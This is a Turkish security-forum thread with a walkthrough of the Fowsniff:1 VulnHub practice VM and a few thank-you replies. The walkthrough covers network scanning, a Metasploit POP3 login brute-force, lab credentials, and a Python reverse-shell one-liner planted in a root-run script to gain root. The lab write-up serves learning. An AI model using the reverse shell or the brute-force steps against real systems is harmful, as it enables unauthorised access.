THT DUYURU

Capture The Flag Vulnerable VM Walkthrough & Capture The Flag Writeup Yazabileceğiniz Bölüm

Seçenekler

Fowsniff: 1 Zafiyetli Makine Çözümü [qwx]

Qwx
Qwx - ait Kullanıcı Resmi (Avatar)
Yardımsever
Üyelik tarihi:
04/2012
Mesajlar:
2.734
Konular:
116
Teşekkür (Etti):
96
Teşekkür (Aldı):
613
Ticaret:
(0) %
01-12-2018 14:33
#1
Fowsniff: 1 Zafiyetli Makine Çözümü [qwx]
Fowsniff : 1 Zafiyetli Makine Çözümü



Fowsniff : 1 İndirme Linki ;

Kod:
https://www.vulnhub.com/entry/fowsniff-1,262/
Makinemizi açtığımız zaman şu şekilde bir görüntü olmaktadır.



Şimdi ilk olarak ağdaki cihazları tarayacağız ve ip adreslerini görüntüleyeceğiz.

Kod:
netdiscover




Zafiyetli makinemizin IP adresini bulduk tarayıcığımzda ip adresine giriş yapıyoruz bizi böyle bir ekran karşılıyor.



Şimdi sırada IP adresindeki açık portları bulmaktır.

Kod:
nmap -sS -sV <adress>




Portlarda bir şey çıkmadığını görüyoruz ardından dirb taraması yapıyoruz.

Kod:
dirb http://<adress>




Evet dirb sonuçlarına baktığımızda buradan bir şey elde edemedik dirb'in bizim işimize yarıyacak siteleri bulamadığı düşünüyorum.
Gobuster taramasını kullanacağım daha ayrıntılı bir sonuç elde etmek için.

Kod:
gobuster -u http://<adress> -x php,html,txt -w <sizin worldlistinizin olduğu konum> -t 200




Gobuster taraması yaptığımızda dirb de çıkmayan /security.txt 'yi elde ediyoruz orayı ziyaret ettiğimizde bizi şu şekilde bir yazı karşılıyor.



Bize gösterilen Fowsniff Corp got pwn3d by B1gN1nj4! yazısını tarayıcıda arattığımızda en aşağıda pastebin sitesi görmekteyiz buraya giriş yaptığımızda bizi şu ekran karşılamaktadır.



Sitede denildiği üzere karışımızda e-mail ve passları bulunmakta bunları kırmamızı istiyor ve passlar MD5 ile şifrelenmiş.Hemen MD5 leri kırmak için bir internet sayfasına giriş yapıyoruz.Yan tarafta kırılmış hallerini görebilirsiniz.



nmap ile yaptığımız port taramasında /110 pop3 portunun açık olduğunu hatırlarsınız şimdi bu id ve passları orada deniyeceğiz.Sayı az olduğu için el yordamı ile de denenebilir fakat pratik için m.e.t.a.sploit framework ile yapmayı öneririm.Öncelikle bize verilen id leri bir txt dosyasının içine koyuyoruz sonra aynı işlemi kırdığımız md5 şifreler için de yapıp msf yi açıyoruz.


Kod:
use auxiliary/scanner/pop3/pop3_login
set RHOSTS <adress>
set user_file <id'lerin tutulduğu txt dosyası>
set pass_file <pass'ların tutulduğu txt dosyası>
run




ID ve Pass ı elde ettik şimdi pop3 e bağlanmak kaldı aşağıdaki kod ile giriş sağlıyoruz ardından içindekileri görmek için listeliyoruz içerisinde 2 adet mesaj bulunmakta ve mesajları göstermesini sağlıyoruz.Kodlar sırası ile aşağıda mevcut.

Kod:
nc <adress> <port>
user seina
pass scoobydoo2
 list
 retr 1 
 retr 2


retr 2 görseli



Mesaj 1 ve mesaj 2 yi incelediğimizde;
Mesaj 1 de : The temporary password for SSH is "S1ck3nBluff+secureshell"

dizisi ile bize protokolün SSH olduğunu söylemektedir.
Mesaj 2 de : Mesajın kimden gönderildiği yazmaktadır.
Bu bilgiler doğrultusunda sıradaki hamlemiz SSH bağlanmak olacaktır.

Kod:
ssh baksteen@<adress>
Sizden şifre isteyecek şifre : S1ck3nBluff+secureshell


Evet şimdi giriş sağladık şimdi içerisi kurcalama vakti geldi.Flag arayışımızda kullanıcı dosyalarını listelememiz lazım.

Kod:
find / -group users -type f 2>/dev/null




Cube mizi bulduk şimdi sıra o dizine gitmekte ve cubeyi göstermekte.Ardından python ve vim i arayacağız.

Kod:
cd /opt/cube
ls -la
cat cube.sh
 whereis python
 whereis vim


Dosyayı vim ile açacağız ve reverse python shell deneyeceğiz.Shell deki python ın yanına 3 rakamını ekliyoruz makinede python3 olduğu için ve CTRL+C :x komutu ile kayıt edip çıkıyoruz hemen yanına da port dinlemeyi açıyoruz.

Kod:
vim cube.sh

python3 -c 'import
 socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.0.0.1",1234));os.dup2(s.fileno(),0);   os.dup2(s.fileno(),1);   os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'

nc -lvp 4444



Dinlenme sonuçları geldi ve hemen kim olduğumuzu soruyoruz.root ile giriş yapıyoruz sadece dosyaları listeleyip flagı bulmak kaldı.




Ve flag.txt gözüktü.






Fownshiff 1 Zafiyetli Makine çözümünün sonuna geldik.Esenlikle kalın.
---------------------
A hacker does for love what others would not do for money.
Konu Qwx tarafından (01-12-2018 17:47 Saat 17:47 ) değiştirilmiştir. Sebep: Logo eklemem istendi.
'Rairsa - ait Kullanıcı Resmi (Avatar)
Üye
Üyelik tarihi:
01/2016
Nereden:
Derin Devlet
Mesajlar:
337
Konular:
66
Teşekkür (Etti):
202
Teşekkür (Aldı):
69
Ticaret:
(0) %
01-12-2018 15:11
#2
elinize sağlık
spravci - ait Kullanıcı Resmi (Avatar)
Üye
Üyelik tarihi:
08/2017
Nereden:
Nereye...
Mesajlar:
1.432
Konular:
46
Teşekkür (Etti):
66
Teşekkür (Aldı):
169
Ticaret:
(0) %
01-12-2018 15:32
#3
Teşekkürler yararlı bir paylaşım
--------------------- dead
'Flash - ait Kullanıcı Resmi (Avatar)
Researcher
Üyelik tarihi:
07/2017
Nereden:
røøt@:~#
Mesajlar:
821
Konular:
30
Teşekkür (Etti):
1254
Teşekkür (Aldı):
219
Ticaret:
(0) %
01-12-2018 16:00
#4
Ellerine sağlık, resimler sana aitse tht ibaresi ekle.
---------------------
Elbet bir gün.
Qwx
Qwx - ait Kullanıcı Resmi (Avatar)
Yardımsever
Üyelik tarihi:
04/2012
Mesajlar:
2.734
Konular:
116
Teşekkür (Etti):
96
Teşekkür (Aldı):
613
Ticaret:
(0) %
01-12-2018 16:52
#5
Alıntı:
'Rairsa´isimli üyeden Alıntı Mesajı göster
elinize sağlık
Alıntı:
spravci´isimli üyeden Alıntı Mesajı göster
Teşekkürler yararlı bir paylaşım
Alıntı:
TheFlashTR´isimli üyeden Alıntı Mesajı göster
Ellerine sağlık, resimler sana aitse tht ibaresi ekle.

Sağolun teşekkürler.
Evet resimlerde dahil olmak üzere hepsi bana aittir en kısa zamanda logo ekleme işlemini de gerçekleştireceğim.
---------------------
A hacker does for love what others would not do for money.

Bookmarks


« Önceki Konu | Sonraki Konu »
Seçenekler